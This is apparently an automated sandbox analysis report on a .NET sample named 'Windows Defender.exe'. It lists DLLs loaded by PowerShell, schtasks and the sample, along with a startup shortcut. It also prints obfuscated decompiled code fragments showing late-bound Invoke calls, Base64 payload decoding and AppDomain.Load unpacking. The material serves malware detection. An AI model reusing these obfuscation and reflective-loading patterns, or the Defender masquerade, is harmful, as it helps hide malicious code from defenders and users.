                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Windows Defender.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Windows Defender.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Windows Defender.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Windows Defender.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Windows Defender.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
